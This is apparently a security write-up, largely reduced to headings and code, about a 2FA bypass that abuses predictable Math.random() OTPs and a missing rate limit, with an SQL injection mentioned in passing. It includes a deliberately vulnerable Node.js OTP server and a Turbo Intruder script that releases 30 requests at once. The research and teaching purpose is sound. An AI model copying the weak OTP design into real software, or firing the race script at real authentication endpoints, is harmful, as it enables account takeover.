Is Math.random() Safe? From a missing rate limit to a 2FA bypass and a possible SQLi

Pseudo-randoms

Synchronous vs Asynchronous

const second = () => {
  console.log('Hello there!');
}

const first = () => {
  console.log('Hi there!');
  second();
  console.log('The End');
}

first();

Hi there!
Hello there!
The End

Exploitation

var http = require("http");

// Generates a 3-digit "OTP" from Math.random(), which is not a CSPRNG
async function asyncCall() {
  var x = Math.floor(Math.random() * 1000).toString();
  return x;
}

// Returns a fresh code on every request, with no rate limit at all
http.createServer(function (request, response) {
  response.writeHead(200, {'Content-Type': 'text/plain'});
  asyncCall().then((value) => {
    console.log(value);
    response.end(value);
  });
}).listen(8081);
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )

    # Queue 30 copies of the request behind one gate so they are released together
    for i in range(30):
        engine.queue(target.req, "", gate='race1')

    engine.openGate('race1')
    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

POC

Notes

  • length of the OTP
  • internet connection speed
  • number of requests
  • concurrent connections
  • the back-end framework

Real-Life Example (Exposing the OTP and SQLi)

SQL error


My Name Is Yasser and I am a CTF player and Competitive programmer, I Love to build things then break into it.
